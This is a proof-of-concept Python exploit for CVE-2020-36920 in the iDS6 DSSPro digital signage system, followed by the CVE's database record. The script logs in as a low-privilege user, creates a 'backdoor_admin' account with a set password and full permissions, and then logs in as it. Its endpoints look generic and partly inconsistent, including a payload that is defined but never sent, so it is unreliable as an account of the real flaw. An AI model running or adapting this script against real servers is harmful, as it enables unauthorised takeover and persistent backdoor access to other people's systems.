CVE-2020-36920

# CVE-2020-36920 PoC - iDS6 DSSPro Privilege Escalation # Author: VulnCheck # Type: Improper Access Control / IDOR import requests import json TARGET = "https://vulnerable-ids6-server.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def exploit(): # Step 1: Authenticate with low privilege account session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } login_resp = session.post(f"{TARGET}/api/auth/login", json=login_data) if login_resp.status_code != 200: print("[-] Authentication failed") return None print("[+] Successfully authenticated as low privilege user") # Step 2: Exploit console JavaScript functions for privilege escalation # Create admin user via insecure direct object reference create_user_payload = { "username": "backdoor_admin", "password": "P@ssw0rd123!", "role": "admin", "permissions": ["*"], "userId": 1 # IDOR - directly referencing admin object } # Alternative: Modify existing user role via JavaScript console escalate_payload = { "userId": 2, "role": "admin", "originalRole": "user" } # Send request through console JavaScript API exploit_resp = session.post( f"{TARGET}/api/users/create", json=create_user_payload, headers={"X-Requested-With": "XMLHttpRequest"} ) if exploit_resp.status_code == 200: print("[+] Privilege escalation successful!") print("[+] Created admin user: backdoor_admin") # Step 3: Login with new admin account admin_login = session.post( f"{TARGET}/api/auth/login", json={"username": "backdoor_admin", "password": "P@ssw0rd123!"} ) if admin_login.status_code == 200: print("[+] Full system compromise achieved") return session else: print(f"[-] Exploitation failed: {exploit_resp.status_code}") return None if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2020-36920", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:48.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "iDS6 DSSPro Digital Signage System 6.2 contains an improper access control vulnerability that allows authenticated users to elevate privileges through console JavaScript functions. Attackers can create users, modify roles and permissions, and potentially achieve full application takeover by exploiting insecure direct object references."}, {"lang": "es", "value": "iDS6 DSSPro Digital Signage System 6.2 contiene una vulnerabilidad de control de acceso inadecuado que permite a los usuarios autenticados elevar privilegios a través de funciones JavaScript de consola. Los atacantes pueden crear usuarios, modificar roles y permisos, y potencialmente lograr el control total de la aplicación explotando referencias directas a objetos inseguras."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2020110025", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191260", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/159918", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20200919100215/http://www.yerootech.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48992", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ids-dsspro-digital-signage-system-privilege-escalation-via-access-control", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48992", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}